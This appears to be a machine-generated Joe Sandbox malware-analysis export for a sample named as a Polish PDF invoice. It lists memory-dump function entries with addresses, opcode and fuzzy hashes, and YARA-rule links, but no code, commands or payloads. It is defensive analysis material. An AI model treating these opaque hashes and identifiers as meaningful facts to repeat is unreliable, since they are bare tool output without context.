                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: badd349f4eeaa677e4f0bf6df0f5a18569ee1873a4d6f68f0c6ab98d42360056
                                                                                      • Instruction ID: fb52d47b62ce5a39577d98519a3141eadfb4f4633042e24d323d0eb9d841fc3f
                                                                                      • Opcode Fuzzy Hash: badd349f4eeaa677e4f0bf6df0f5a18569ee1873a4d6f68f0c6ab98d42360056
                                                                                      • Instruction Fuzzy Hash: BE01C474902219DFEB60DF18E888B9CBBB2FB05301F1041A9E609A3350DB705E90CF64
                                                                                      Function 066A87F5 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: d9f5095bf4701743f13fe438e3353106d6384fad394eee7aa8becc03624740cb
                                                                                      • Instruction ID: 068ca95693d51b6b841db22619d929ff9e04ce3b5502ab1a2a02f8d7ede6e63c
                                                                                      • Opcode Fuzzy Hash: d9f5095bf4701743f13fe438e3353106d6384fad394eee7aa8becc03624740cb
                                                                                      • Instruction Fuzzy Hash: F4F0F974A01258DFDB50DF58E888B9CBBB2FB45315F5080AAE509A7390CB345DD8CF61
                                                                                      Function 066A8BF4 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: f7f89a34110a039c0c872a309d2e9a5e6cb65578622a9686642ea68022793ad4
                                                                                      • Instruction ID: 4040a54660f5ec7ec1eae2c4676008ed35d89802993af8fc202ed7c1ee4d79bd
                                                                                      • Opcode Fuzzy Hash: f7f89a34110a039c0c872a309d2e9a5e6cb65578622a9686642ea68022793ad4
                                                                                      • Instruction Fuzzy Hash: D1F0C474901218DFEB54DF28E48879CBBB2FB45311F4015A9E60AA3390CB705ED0CF54
                                                                                      Function 066A8105 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 5daf03343663093b895a17ed466603b394097eea9671d6b3984a3be60280fd62
                                                                                      • Instruction ID: 330bb121ca9b4277c31fc46b31e7eb73e89f440f8f796b701892c1e145195ed6
                                                                                      • Opcode Fuzzy Hash: 5daf03343663093b895a17ed466603b394097eea9671d6b3984a3be60280fd62
                                                                                      • Instruction Fuzzy Hash: 2DF0CF74A02208DFEB54DF58E898B9CBBB2FB45310F1001A9E605A3380CB705ED4CFA4
                                                                                      Function 066A5E27 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7a5cf8781c2ac2958c4a3b4043724583f94f9155fea4e2d1732b584fa91c63d2
                                                                                      • Instruction ID: 7c824a98c32a1398539e6e75c7b6ee64313bf8c9488947a798781e73c3bea1cc
                                                                                      • Opcode Fuzzy Hash: 7a5cf8781c2ac2958c4a3b4043724583f94f9155fea4e2d1732b584fa91c63d2
                                                                                      • Instruction Fuzzy Hash: FAF0AB74A11258CFEB50DF18D884B8DB7B2FB06300F0041A9E419A7344CB305D84CF10
                                                                                      Function 066A5A3F Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7a80395bf52d51349eb6687248f5b6ff040545ed31fd1d5fcb54f2038b164f74
                                                                                      • Instruction ID: 203e4cbbc72e1fea28d2a26d795cefb4093a12398991432e59de601dd6e1627e
                                                                                      • Opcode Fuzzy Hash: 7a80395bf52d51349eb6687248f5b6ff040545ed31fd1d5fcb54f2038b164f74
                                                                                      • Instruction Fuzzy Hash: 95F03974A00118CFDB54DBA8E4447DCB7B2FB86315F008066E61AA3244CB309DAACF60
                                                                                      Function 00D78593 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: 1907852dd78d131b8a91a058bfc089e13f97fe96137a7a7c629e4d996fbfbb9d
                                                                                      • Instruction ID: fd6ed4227421d2c81ae886bc33cd866ad01188a102cd0cdfff29a1649b5daec8
                                                                                      • Opcode Fuzzy Hash: 1907852dd78d131b8a91a058bfc089e13f97fe96137a7a7c629e4d996fbfbb9d
                                                                                      • Instruction Fuzzy Hash: 34F0FF70804369CFCB60CF64CD887A9B7B5EB49300F1040E6A40DA2240DB346FC1DF22
                                                                                      Function 066A8966 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: e4eef343aa16d0d152567355b7e680f79ea7119b4a8c9efcd2856c297c5c00c8
                                                                                      • Instruction ID: b2fd822679cc8c50087683f2e0cd91ecffd7c417a81b9466eee383a2e32b76d4
                                                                                      • Opcode Fuzzy Hash: e4eef343aa16d0d152567355b7e680f79ea7119b4a8c9efcd2856c297c5c00c8
                                                                                      • Instruction Fuzzy Hash: D8F01C34A0121C9FD754DF24E8596DD7B72FB09311F001198E209A3350CB315ED5CF65
                                                                                      Function 0676E720 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 8b1d9a99934a8a5e02e6b0b4beb00288cca7f6f30b7f7a3bde09524812a40ebe
                                                                                      • Instruction ID: 0fe7bbb5d9c6f390eb6f059dafc8f86d12169501e9c2d2b39f279a5db1b245e4
                                                                                      • Opcode Fuzzy Hash: 8b1d9a99934a8a5e02e6b0b4beb00288cca7f6f30b7f7a3bde09524812a40ebe
                                                                                      • Instruction Fuzzy Hash: A2E01234A042048FD700DF64D454A5DFB71EF41318F24911DD50267385CA319D56CF54
                                                                                      Function 066A8177 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 78c6936430cad56191b8b89c5e500b6aa4cc1b2514853d1bba61195684aabe11
                                                                                      • Instruction ID: 4a73fcccefff8e1f62d43b9f819406a8888e6bf1d546c3bcd70da74668c7a24d
                                                                                      • Opcode Fuzzy Hash: 78c6936430cad56191b8b89c5e500b6aa4cc1b2514853d1bba61195684aabe11
                                                                                      • Instruction Fuzzy Hash: F1F01C74A00119CFC764DF15E850BAEBBB1FB48304F0041A99959A3745DB304E959F60
                                                                                      Function 06502A69 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: V
                                                                                      • API String ID: 0-1342839628
                                                                                      • Opcode ID: 88f836c65e59169baf2b314322f91c469dc8f1082568c3ed43178e2cddb1f3db
                                                                                      • Instruction ID: 91b268295377a0a2e128eca0d6ae3df0710582cd4d2385fcd976de9f76ab2008
                                                                                      • Opcode Fuzzy Hash: 88f836c65e59169baf2b314322f91c469dc8f1082568c3ed43178e2cddb1f3db
                                                                                      • Instruction Fuzzy Hash: 4AF07F74906228CFEBA5EF10CD90FA9BBB6FB49200F0052D9C818A3394C7716E90DF60
                                                                                      Function 066A875C Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: b6ba9ce4350cff6764b3b5c48040d94688e8f6327de01d27e8c4ed330aed7d7c
                                                                                      • Instruction ID: 6d57ebfde57fd9aeb78c9becf9f07c0d9ab8c5170cb73a1710cda6f639038df4
                                                                                      • Opcode Fuzzy Hash: b6ba9ce4350cff6764b3b5c48040d94688e8f6327de01d27e8c4ed330aed7d7c
                                                                                      • Instruction Fuzzy Hash: 57E0EE74A06208DFDB04DF99E08879CBBB2FB4A304F548029E106A7798CBB49CD4CF44
                                                                                      Function 066A81E2 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 934c6330bd2273a29150be142a63c6a53cf0e9e02bfff92dcb53fdd6ec8e88b1
                                                                                      • Instruction ID: 8b1232f624cd93cb729a3ba904e1579f74c51a310ff08d3804161fcbdcd176f2
                                                                                      • Opcode Fuzzy Hash: 934c6330bd2273a29150be142a63c6a53cf0e9e02bfff92dcb53fdd6ec8e88b1
                                                                                      • Instruction Fuzzy Hash: CFE0EE74A06208DFDB509F98E088BACBBB3FB02314F100028E506AB789CB745DD8DF54
                                                                                      Function 066A8ABD Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: b51c28af2c333efe0f2601ff0e8feb87cb85fc255d3ae04adf5b475b766e11bb
                                                                                      • Instruction ID: 10c080414dd4c4417d2c98d11bfe8b54d65dadd7d6063a8b5b8c9f71eee0ac00
                                                                                      • Opcode Fuzzy Hash: b51c28af2c333efe0f2601ff0e8feb87cb85fc255d3ae04adf5b475b766e11bb
                                                                                      • Instruction Fuzzy Hash: 2EE0E574A002189FC710DF24E8487DEBB72FB4A300F004099E649A3384DB711E90CFA5
                                                                                      Function 066A879F Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 8166e2245119922027667aa2baddd33d8b439d3d9e8dfc254173abb6cf40b974
                                                                                      • Instruction ID: 80f7a10a09e1a434140cf50d978794a40560f748337dd40a2f28d84406c18308
                                                                                      • Opcode Fuzzy Hash: 8166e2245119922027667aa2baddd33d8b439d3d9e8dfc254173abb6cf40b974
                                                                                      • Instruction Fuzzy Hash: 2CE0E534A012188FC759DF54E9152D877B2FB8D300F004498D61AA7381DB701E988F60
                                                                                      Function 066A85D2 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: c8ce0a34ab1630f6429f4d69cd7e163f6d23def865223463abf882db73761d6c
                                                                                      • Instruction ID: d85a0da1f2b30aee0a6fb13d60a6537adcbd43ac449ff8d837a5eba58e8be382
                                                                                      • Opcode Fuzzy Hash: c8ce0a34ab1630f6429f4d69cd7e163f6d23def865223463abf882db73761d6c
                                                                                      • Instruction Fuzzy Hash: 62E01A30A00118DFD754EF24E858B9DBBB2EB49301F108099D50AA3394CB311E95CF21
                                                                                      Function 066A822A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 74fb4690e6d82510d4b254afbcfbca7c36d8e927a5f4e1069bf873f71effd585
                                                                                      • Instruction ID: 2598aea51b9a7c9e9634be695e8d7de53594c3d4f76879d21c9b20b0871eea3d
                                                                                      • Opcode Fuzzy Hash: 74fb4690e6d82510d4b254afbcfbca7c36d8e927a5f4e1069bf873f71effd585
                                                                                      • Instruction Fuzzy Hash: FAE09A74A04218DFE754DF14E854BDDBBB2EB4A304F10509EE54AA7384CB305EA48F66
                                                                                      Function 066A8B6B Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: a32e53c5aee5b06de9b35d66273e260247a67001aaac1ec394e8b3f6d0d21bb6
                                                                                      • Instruction ID: bdaf0f9b1fc3274da4b15fb0833d5e0a619abc3b8f1470e066c8c6c8a45e2579
                                                                                      • Opcode Fuzzy Hash: a32e53c5aee5b06de9b35d66273e260247a67001aaac1ec394e8b3f6d0d21bb6
                                                                                      • Instruction Fuzzy Hash: B5E04F30A04218CFC750DF24E9587DDBBB3EB46304F0000D9961AA3385CB311E908F21
                                                                                      Function 066A8B15 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7530ebc395b7af9a05ed786b36d961f21b6f8048afbe6e0211f36ea19e4e0889
                                                                                      • Instruction ID: 34290643be90f1d640242dbc216c85133e46de448bc93186223e00df1c7f0184
                                                                                      • Opcode Fuzzy Hash: 7530ebc395b7af9a05ed786b36d961f21b6f8048afbe6e0211f36ea19e4e0889
                                                                                      • Instruction Fuzzy Hash: 7CE01A34A04218DFC754DF24E8546DCBBB2FF5A310F1042D8914AA3380CB701ED98F66
                                                                                      Function 066A5C4C Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: e7522fb3ef8c262daecb26fa6f373c7e6ca172678b8692b1d16e1668cd0a2a99
                                                                                      • Instruction ID: 6d7c57032194cbc3572500b9f714cb7270b6e00e6d589d9214876056279a75dd
                                                                                      • Opcode Fuzzy Hash: e7522fb3ef8c262daecb26fa6f373c7e6ca172678b8692b1d16e1668cd0a2a99
                                                                                      • Instruction Fuzzy Hash: BAE0B6B4A042189FDBA0EF14E885B99BBB5FB4B310F104198E40DD7349CA345DA8DF65
                                                                                      Function 065CBA1C Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 6727df8ce7afdb9200b6c54b2498023b0572bb693fc59bf99e6ace5f8fb81164
                                                                                      • Instruction ID: 0559986a611c55cd31c995fefd28bf6a57244e14529dfa7e2e7034ff0d20ae83
                                                                                      • Opcode Fuzzy Hash: 6727df8ce7afdb9200b6c54b2498023b0572bb693fc59bf99e6ace5f8fb81164
                                                                                      • Instruction Fuzzy Hash: BCD052B4E04028CFEB10DF64E924F9AB7B2FB4A304F009298D609B3388CB315D818F61
                                                                                      Function 065C7226 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6
                                                                                      • API String ID: 0-498629140
                                                                                      • Opcode ID: 035cb0f209dc081a198d0e2c5b2420bf58b7b120f4de2d770addea3d208a4326
                                                                                      • Instruction ID: e2a9009923e12e4131291453053bc3ac96adaf7efdd7327c72c932813ed78fb2
                                                                                      • Opcode Fuzzy Hash: 035cb0f209dc081a198d0e2c5b2420bf58b7b120f4de2d770addea3d208a4326
                                                                                      • Instruction Fuzzy Hash: 1EE01774D20018DFEB50DFE8E850B8DBBB1FB08310F00808AE509A3241C3344A41CF64
                                                                                      Function 065C113A Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 188fe0e7d75da2943d170ee991f296fa48b1471d693c4fb176f4405b202362df
                                                                                      • Instruction ID: bb95629aa7d8f52653c10052b72f9fa17cc5d37a9cb4cbff01b89006c19d0e43
                                                                                      • Opcode Fuzzy Hash: 188fe0e7d75da2943d170ee991f296fa48b1471d693c4fb176f4405b202362df
                                                                                      • Instruction Fuzzy Hash: 40D0C978A00118CFD754EFD4E468ADEBBB6EB8A319F11C0189525A7389CA305C558FA0
                                                                                      Function 065036C3 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: f
                                                                                      • API String ID: 0-1993550816
                                                                                      • Opcode ID: 8bbb5594abd9787fab99a9c865bef1a027cd4310f8aad4de9b07c587f5b019af
                                                                                      • Instruction ID: 4e2fa460c7485800d2066b669d7343d70867d0fbecdbe06142ea1744b906aed1
                                                                                      • Opcode Fuzzy Hash: 8bbb5594abd9787fab99a9c865bef1a027cd4310f8aad4de9b07c587f5b019af
                                                                                      • Instruction Fuzzy Hash: 2FD09274D20229CBDB65CF54D9A0ADEB7B9FB46310F0059EA9809B3240D3319F908F80
                                                                                      Function 066AC5B2 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [
                                                                                      • API String ID: 0-784033777
                                                                                      • Opcode ID: a3114b3989cf68398e273af46fab451c7c5a82a7f46280e87f007807a1b7f336
                                                                                      • Instruction ID: cb80e97d25458a06d31d581236c63fdc31e2611f9ff381ff13328fd6b960aa8a
                                                                                      • Opcode Fuzzy Hash: a3114b3989cf68398e273af46fab451c7c5a82a7f46280e87f007807a1b7f336
                                                                                      • Instruction Fuzzy Hash: B9C04C3024E3C03FFB1246605D26B573F255BC2741F1901C3B2849E0D385981948C777
                                                                                      Function 0650A30C Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: '
                                                                                      • API String ID: 0-1997036262
                                                                                      • Opcode ID: 7829baaf641f164df047bdfd8c878052dec17fceeefe5b85f18c171eb495f17d
                                                                                      • Instruction ID: 40e3f3858893c5bbe6afb610f5fbef31a02cdfad6b0130bc5431adee426a9988
                                                                                      • Opcode Fuzzy Hash: 7829baaf641f164df047bdfd8c878052dec17fceeefe5b85f18c171eb495f17d
                                                                                      • Instruction Fuzzy Hash: 52D0C970A05219CFDB20EF24CD48B8AB7B6BF86300F0025D5D409A7250DBB09E81CF02
                                                                                      Function 06765BE8 Relevance: .4, Instructions: 437COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d63448538a95d47e4711451a1f2295996b1a1c681f9dcfa887c870e39b8e388e
                                                                                      • Instruction ID: 88e038d112afc3c713c0dc2f36d5f6173a6c860b7ebfcb7f1b231183ef4cbed9
                                                                                      • Opcode Fuzzy Hash: d63448538a95d47e4711451a1f2295996b1a1c681f9dcfa887c870e39b8e388e
                                                                                      • Instruction Fuzzy Hash: C6120C34A002198FCB54EF65C894BADB7B2BF89300F5185A8E94AAB355DF30ED85DF50
                                                                                      Function 06765BD8 Relevance: .2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f7e9cee57c1922af8e2a2c50b974cbf0480fdd89a8249fc983cc5879b244192
